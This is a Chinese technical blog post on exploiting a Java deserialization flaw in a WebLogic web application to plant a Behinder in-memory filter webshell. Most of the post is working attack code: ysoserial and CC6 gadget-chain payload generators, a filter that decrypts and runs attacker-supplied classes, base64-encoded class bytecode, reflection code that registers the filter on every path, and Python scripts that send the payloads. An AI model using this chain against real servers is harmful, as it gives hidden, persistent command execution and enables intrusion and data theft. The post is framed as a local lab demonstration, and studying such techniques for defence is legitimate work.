基于weblogic的web应用发序列化漏洞内存马

已于 2022-08-11 00:19:26 修改
阅读量2.4k 收藏 2
点赞数 1
分类专栏: 安全 文章标签: 反序列化漏洞 weblogic 内存马
于 2022-08-11 00:14:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/126210785
版权

文章目录

背景

一个基于weblogic的web应用,如果它有反序列化漏洞,可以试试下面这条路

环境搭建

安装weblogic,参考链接
idea 创建一个web application项目,application server 后面再加,或者用idea打开我的demo项目myWebApp
在这里插入图片描述
edit configurations
在这里插入图片描述
增加war exploded
在这里插入图片描述
运行项目
在这里插入图片描述

反序列化漏洞

可以直接打,需使用ysoserial,会弹出计算器:

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @Date    : 2022/05/09
# @Author  : 5wimming
import requests
import subprocess
import time
import base64

def origin_yso(pds):
    for payload in pds:
        cmd = 'open /System/Applications/Calculator.app'
        if 'URLDNS' in payload:
            cmd = 'http://' + cmd.split(' ')[1]
        yso_args = ['java',
                    '-jar',
                    './tools/ysoserial/ysoserial-0.0.6-SNAPSHOT-all.jar',
                    payload,
                    cmd]
        try:
            p = subprocess.Popen(yso_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            out, err = p.communicate()
            print(payload, yso_args)
            burp0_headers = {
                "User-Agent": "Mozilla/6.0 (Macintosh; rv:81.0) Firefox/81.0",
                "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.4",
                "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8",
                "Connection": "close"}
            r = requests.post('http://localhost:7001/myWebApp_war_exploded/hi', headers=burp0_headers, data=out, verify=False, timeout=20)
            print(r.text)
            time.sleep(3)
        except Exception as e:
            print(e)



if __name__ == '__main__':
    payloads = ["CommonsBeanutils5", "CommonsBeanutils6"]
    origin_yso(payloads)

Filter内存马

首先基于冰蝎实现filter内存马

package com.payload.desc;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;

public class WebloglcFilter implements Filter {

    @Override
    public void destroy() {

    }

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {

        try {
            if(((HttpServletRequest)request).getMethod().equals("POST")){

                HttpSession session = ((HttpServletRequest)request).getSession();
                String k = "e45e329feb5d925b";
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));

                HashMap map = new HashMap();
                map.put("request", request);
                map.put("response", response);
                map.put("session", session);

                //取classloader
                byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
                ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();
                java.lang.reflect.Method define = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
                define.setAccessible(true);
                Class uclass = null;
                try{
                    uclass = cl.loadClass("U");
                }catch(ClassNotFoundException e){
                    uclass  = (Class)define.invoke(cl,bytecode,0,bytecode.length);
                }

                Constructor constructor =  uclass.getDeclaredConstructor(ClassLoader.class);
                constructor.setAccessible(true);
                Object u = constructor.newInstance(this.getClass().getClassLoader());
                Method Um = uclass.getDeclaredMethod("g",byte[].class);
                Um.setAccessible(true);

                //冰蝎payload
                byte[] evilClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
                Class evilclass = (Class) Um.invoke(u,evilClassBytes);
                Object a = evilclass.newInstance();
                Method b = evilclass.getDeclaredMethod("equals",Object.class);
                b.setAccessible(true);
                b.invoke(a, map);
                return;

            }
        }catch(Exception ex){
            ex.printStackTrace();

        }
        chain.doFilter(request, response);

    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {

    }

    public static void main(String[] args) {

    }
}

将WebloglcFilter编译后的class转换成字节码

public static void main(String[] args) {
        try{
            File file = new File("./WebloglcFilter.class");
            FileInputStream fileInputStream = new FileInputStream(file);
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            byte[] bytes = new byte[4096];
            int len;
            while ((len = fileInputStream.read(bytes))!=-1){
                byteArrayOutputStream.write(bytes,0,len);
            }
            String encode = new BASE64Encoder().encode(byteArrayOutputStream.toByteArray());
            System.out.println(encode.replaceAll("\\r|\\n",""));
        }catch (Exception e){
            e.printStackTrace();
        }
    }

在这里插入图片描述
将WebloglcFilter.class的字节码作为输入,基于weblogic相关上下文的具体payload实现:

package com.payload.desc;

import sun.misc.BASE64Decoder;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.WebAppServletContext;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Map;

public class WeblogicImpl extends AbstractTranslet {

    public WeblogicImpl() {
        super();


        Thread thread = Thread.currentThread();
        try {
            //获取WebAppServletContext
            Field workEntry = Class.forName("weblogic.work.ExecuteThread").getDeclaredField("workEntry");
            workEntry.setAccessible(true);
            Object workentry = workEntry.get(thread);
            WebAppServletContext webAppServletContext=null;
            try{ //weblogic 12.1.3
                Field connectionHandler = workentry.getClass().getDeclaredField("connectionHandler");
                connectionHandler.setAccessible(true);
                Object http = connectionHandler.get(workentry);

                Field request1 = http.getClass().getDeclaredField("request");
                request1.setAccessible(true);
                ServletRequestImpl servletRequest = (ServletRequestImpl) request1.get(http);

                Field context = servletRequest.getClass().getDeclaredField("context");
                context.setAccessible(true);
                webAppServletContext = (WebAppServletContext) context.get(servletRequest);

            }catch (Exception e){
                //weblogic 1036
                Field context = workentry.getClass().getDeclaredField("context");
                context.setAccessible(true);
                webAppServletContext = (WebAppServletContext) context.get(workentry);
            }
            if(webAppServletContext==null){throw new Exception("null");}
            //加载WebloglcFilter的字节码
            String encode_class = "yv66vgAAADQBBwoAJgCEBwCFCwACAIYIAIcKAIgAiQsAAgCKCACLCABaCwCMAI0IAI4KAI8AkAcAkQoAiACSCgAMAJMKAI8AlAcAlQoAEACECABjCgAQAJYIAGUIAEgKAJcAmAgAmQoAmgCbCgCcAJ0KAJwAngoAJgCfCgAeAKAIAKEHAKIHAFEJAKMApAoAHgClCgCmAKcIAKgKACkAqQcAqgcAqwoAowCsCgCmAK0HAK4KAB4ArwoAsACnCgAeALEKALAAsggAswcAtAoALwCECwC1ALYKALcAuAoALwC5CgCPALoKAB4AuwgAvAcAvQoANwC+CwC/AMAHAMEHAMIBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIUxjb20vcGF5bG9hZC9kZXNjL1dlYmxvZ2xjRmlsdGVyOwEAB2Rlc3Ryb3kBAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAAFlAQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEAB3Nlc3Npb24BACBMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEAAWsBABJMamF2YS9sYW5nL1N0cmluZzsBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQADbWFwAQATTGphdmEvdXRpbC9IYXNoTWFwOwEACGJ5dGVjb2RlAQACW0IBAAJjbAEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAGZGVmaW5lAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZ1Y2xhc3MBABFMamF2YS9sYW5nL0NsYXNzOwEAC2NvbnN0cnVjdG9yAQAfTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAAXUBABJMamF2YS9sYW5nL09iamVjdDsBAAJVbQEADmV2aWxDbGFzc0J5dGVzAQAJZXZpbGNsYXNzAQABYQEAAWIBAAJleAEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3JlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAH0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAVjaGFpbgEAG0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOwEADVN0YWNrTWFwVGFibGUHAMEHAMMHAMQHAMUHAMYHAMcHAMgHAJUHAK4HAMkHAKIHAKoHAL0BAApFeGNlcHRpb25zBwDKBwDLAQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBABNXZWJsb2dsY0ZpbHRlci5qYXZhDAA8AD0BACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0DADMAM0BAARQT1NUBwDHDAC8AM4MAM8A0AEAEGU0NWUzMjlmZWI1ZDkyNWIHAMYMANEA0gEAA0FFUwcAyAwA0wDUAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwA1QDWDAA8ANcMAHoA2AEAEWphdmEvdXRpbC9IYXNoTWFwDADZANoHANsMANwA3wECZHl2NjZ2Z0FBQURRQUdnb0FCQUFVQ2dBRUFCVUhBQllIQUJjQkFBWThhVzVwZEQ0QkFCb29UR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzcFZnRUFCRU52WkdVQkFBOU1hVzVsVG5WdFltVnlWR0ZpYkdVQkFCSk1iMk5oYkZaaGNtbGhZbXhsVkdGaWJHVUJBQVIwYUdsekFRQURURlU3QVFBQll3RUFGMHhxWVhaaEwyeGhibWN2UTJ4aGMzTk1iMkZrWlhJN0FRQUJad0VBRlNoYlFpbE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFBV0lCQUFKYlFnRUFDbE52ZFhKalpVWnBiR1VCQUFaVkxtcGhkbUVNQUFVQUJnd0FHQUFaQVFBQlZRRUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUMyUmxabWx1WlVOc1lYTnpBUUFYS0Z0Q1NVa3BUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0FJUUFEQUFRQUFBQUFBQUlBQUFBRkFBWUFBUUFIQUFBQU9nQUNBQUlBQUFBR0tpdTNBQUd4QUFBQUFnQUlBQUFBQmdBQkFBQUFBZ0FKQUFBQUZnQUNBQUFBQmdBS0FBc0FBQUFBQUFZQURBQU5BQUVBQVFBT0FBOEFBUUFIQUFBQVBRQUVBQUlBQUFBSktpc0RLNzYzQUFLd0FBQUFBZ0FJQUFBQUJnQUJBQUFBQXdBSkFBQUFGZ0FDQUFBQUNRQUtBQXNBQUFBQUFBa0FFQUFSQUFFQUFRQVNBQUFBQWdBVAcA4AwA4QDiBwDjDADkAOUMAOYA5wwA6ADpDADqAOkBAAtkZWZpbmVDbGFzcwEAD2phdmEvbGFuZy9DbGFzcwcA6wwA7ABXDADtAO4HAMkMAO8A8AEAAVUMAPEA8gEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uAQAQamF2YS9sYW5nL09iamVjdAwA8wD0DAD1APYBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIMAPcA+AcA+QwA+gDnDAD7APwBAAFnAQAWc3VuL21pc2MvQkFTRTY0RGVjb2RlcgcAwwwA/QD+BwD/DAEAAM0MAQEA4gwBAgEDDAD7AQQBAAZlcXVhbHMBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAEFAD0HAMUMAEQBBgEAH2NvbS9wYXlsb2FkL2Rlc2MvV2VibG9nbGNGaWx0ZXIBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAB5qYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb24BABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAE2phdmEvaW8vSU9FeGNlcHRpb24BAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BAAlnZXRNZXRob2QBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACmdldFNlc3Npb24BACIoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAIcHV0VmFsdWUBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9PYmplY3Q7KVYBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS91dGlsL0Jhc2U2NAEACmdldERlY29kZXIBAAdEZWNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcgEABmRlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEADWdldFN1cGVyY2xhc3MBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEABmludm9rZQEAOShM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";
            byte[] decode_class = new BASE64Decoder().decodeBuffer(encode_class);
            Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            defineClass.setAccessible(true);
            //这里为了适配weblogic 1036 必须反射获取webAppServletContext中的classLoader
            Field loader = webAppServletContext.getClass().getDeclaredField("classLoader");
            loader.setAccessible(true);
            ClassLoader ClassLoader0= (ClassLoader) loader.get(webAppServletContext);
            Class filter_class = (Class) defineClass.invoke(ClassLoader0, decode_class, 0, decode_class.length);

            //获取ChangeAwareClassLoader,因为cachedClasses这个变量在ChangeAwareClassLoader中
            Field classLoader = webAppServletContext.getClass().getDeclaredField("classLoader");
            classLoader.setAccessible(true);
            ClassLoader classLoader1 = (ClassLoader) classLoader.get(webAppServletContext);
            //获取cachedClasses
            Field cachedClasses = classLoader1.getClass().getDeclaredField("cachedClasses");
            cachedClasses.setAccessible(true);
            Object cachedClasses_map = cachedClasses.get(classLoader1);
            Method get = cachedClasses_map.getClass().getDeclaredMethod("get", Object.class);
            get.setAccessible(true);
            //如果cachedClasses中不存在cmdFilter类
            if (get.invoke(cachedClasses_map, "cmdFilter") == null) {
                //把cmdFilter的class 存入cachedClasses中
                Method put = cachedClasses_map.getClass().getMethod("put", Object.class, Object.class);
                put.setAccessible(true);
                put.invoke(cachedClasses_map, "cmdFilter", filter_class);
                //获取filterManager类
                Field filterManager = webAppServletContext.getClass().getDeclaredField("filterManager");
                filterManager.setAccessible(true);
                Object o = filterManager.get(webAppServletContext);
                //注册Filter
                Method registerFilter = o.getClass().getDeclaredMethod("registerFilter", String.class, String.class, String[].class, String[].class, Map.class, String[].class);
                registerFilter.setAccessible(true);
                registerFilter.invoke(o, "test", "cmdFilter", new String[]{"/*"}, null, null, null);
            }
        } catch (Exception e) {

        }
    }


    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    public static void main(String[] args) {
        System.out.println("weblogic");
    }
}

基于cc6链生成最终payload

package com.payload.desc;


import com.nqzero.permit.Permit;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;


public class CC6Template {
    public static void main(String[] args) throws Exception {

        byte[] bytes = getBytes();

        // 反射修改属性以及调用方法
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templates, "_name", "F4DE");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        // 先设置一个无害方法,防止在 Map#put 方法中触发Gadget
        Transformer invokerTransformer = new InvokerTransformer("getClass", null, null);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, invokerTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, templates);

        HashMap expMap = new HashMap();
        expMap.put(tiedMapEntry, "value");
        outerMap.clear();
        // 反射修改 iMethodName 字段为 newTransformer
        setFieldValue(invokerTransformer, "iMethodName", "newTransformer");

        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc6.ser"));
        outputStream.writeObject(expMap);
        outputStream.close();

        // ======反序列化======
        ByteArrayOutputStream barr_out = new ByteArrayOutputStream();
        ObjectOutputStream ops = new ObjectOutputStream(barr_out);
        ops.writeObject(expMap);
        ops.close();

        // ======序列化=======
        ByteArrayInputStream barr_in = new ByteArrayInputStream(barr_out.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(barr_in);
        ois.readObject();
        ois.close();
        barr_in.close();
    }

    static void setFieldValue(Object obj, String field, Object value) throws Exception {
        Class<?> clazz = Class.forName(obj.getClass().getName());
        Field field1 = clazz.getDeclaredField(field);
        field1.setAccessible(true);
        field1.set(obj, value);
    }

    public static byte[] getBytes() throws IOException {
        InputStream inputStream = new FileInputStream(new File("./WeblogicImpl.class"));

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        int n = 0;
        while ((n=inputStream.read())!=-1){
            byteArrayOutputStream.write(n);
        }
        byte[] bytes = byteArrayOutputStream.toByteArray();
        return bytes;
    }
}

do it

这里通过python发包办它

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @Date    : 2022/05/09
# @Author  : 5wimming
import requests
import subprocess
import time
import base64

def send_local_ser():
    out = open('./cc6.ser', 'rb').read()
    try:
        burp0_headers = {
            "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8",
            "Connection": "close"}
        r = requests.post('http://localhost:7001/myWebApp_war_exploded/hi', headers=burp0_headers, data=out,
                          verify=False, timeout=10)
        print(r.text)
        time.sleep(3)
    except Exception as e:
        print(e)


if __name__ == '__main__':
    send_local_ser()

使用冰🦀️蝎连接
在这里插入图片描述

执行命令
在这里插入图片描述

参考:
https://www.cnblogs.com/nice0e3/p/14956677.html
https://myzxcg.com/2021/11/Weblogic-%E5%86%85%E5%AD%98%E9%A9%AC%E5%88%86%E6%9E%90%E4%B8%8E%E5%AE%9E%E7%8E%B0/
https://www.modb.pro/db/375028

5wimming
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内存Webshell详解
悦分享
11-08 4598
内存webshell相比于常规webshell更容易躲避传统安全监测设备的检测,通常被用来做持久化,规避检测,持续驻留目标服务器。无文件攻击、内存Webshell、进程注入等基于内存的攻击手段也受到了大多数攻击者青睐。内存是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到。因此内存近年来越来越被重视,逐渐成为了攻击方的“必备武器”,针对内存的防护也越来越被重视。
Weblogic内存大小配置
02-08
应用服务器Weblogic内存大小配置,调优
Weblogic下的servlet内存注入-无参照纯调试
damimi00的博客
07-05 726
目录1、寻找servlet注入方法1.1 调试1.2 servletMapping添加servlet2、获取request2.1 从当前线程寻找信息2.2 JNDI注入到内存注入3、关于filter和listener 前面一段时间学习Tomcat下注入内存和spring下的内存,之后又实现了Resin下的内存,但Resin下的servlet和filter内存都要依靠defineClass,这就需要编译java文件以及base64编码操作,觉得还是有点麻烦,Resin下最好用的当然还是listen.
初识内存
歪曌的博客
06-17 1394
webshell展、内存分类和原理、内存排查
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1502
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞,远程攻击者可以通过送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在未经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
Java反序列化实战.pdf
08-08
- **Ysoserial**:原生序列化PoC生成工具,可用于测试和验证潜在的序列化漏洞。 - **Marshalsec**:第三方格式序列化PoC生成工具,支持多种序列化方式。 - **Freddy**:Burp插件,用于测试和探测Java反序列化漏洞...
Weblogic漏洞扫描工具
02-22
这些反序列化漏洞的存在,强调了对Java应用程序序列化安全的重视,因为反序列化过程如果没有得到充分的防护,容易成为攻击者的入口。 对于这些漏洞,`weblogic-scan-master`这样的工具提供了自动化扫描的功能,帮助...
java反序列化工具
11-21
反序列化漏洞主要出现在代码不正确地处理来自不可信源的序列化数据时。攻击者可以构造恶意的序列化对象,当它被目标应用反序列化时,可能会触任意代码执行、权限提升或其他安全漏洞。这些漏洞通常利用了类库中的...
weblogic_12c_patch.rar
06-20
反序列化漏洞通常出现在对象持久化或网络传输过程中。在WebLogic的上下文中,它可能允许攻击者通过送恶意构造的序列化数据,来执行服务器上的任意代码。这种漏洞可能导致服务器的完全控制,包括数据泄露、服务中断...
weblogic中java项目日志文件_weblogic日志报错too many open files
weixin_39600616的博客
03-02 226
很久以前的问题了:1.日志报错too many open files;2.诊断思路:查看该进程实际打开的文件数是多少?用lsof命令查看domain对应的进程号;lsof -p 2744 |wc -l查看总的大小;以及可以看到具体打开的那些文件;3.检查当前的系统配置ulimit -a但是刚才做的一切都显示配置没有问题,但是进程打开了1024个文件,却报了打开文件个数台多的问题;在网上找到以下的文...
Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场
Love&Share
04-07 1685
与实际区别。
漏洞复现】1. WebLogic 反序列化漏洞(CVE-2019-2890)复现与分析
最新发布
Zichel77的博客
03-21 1679
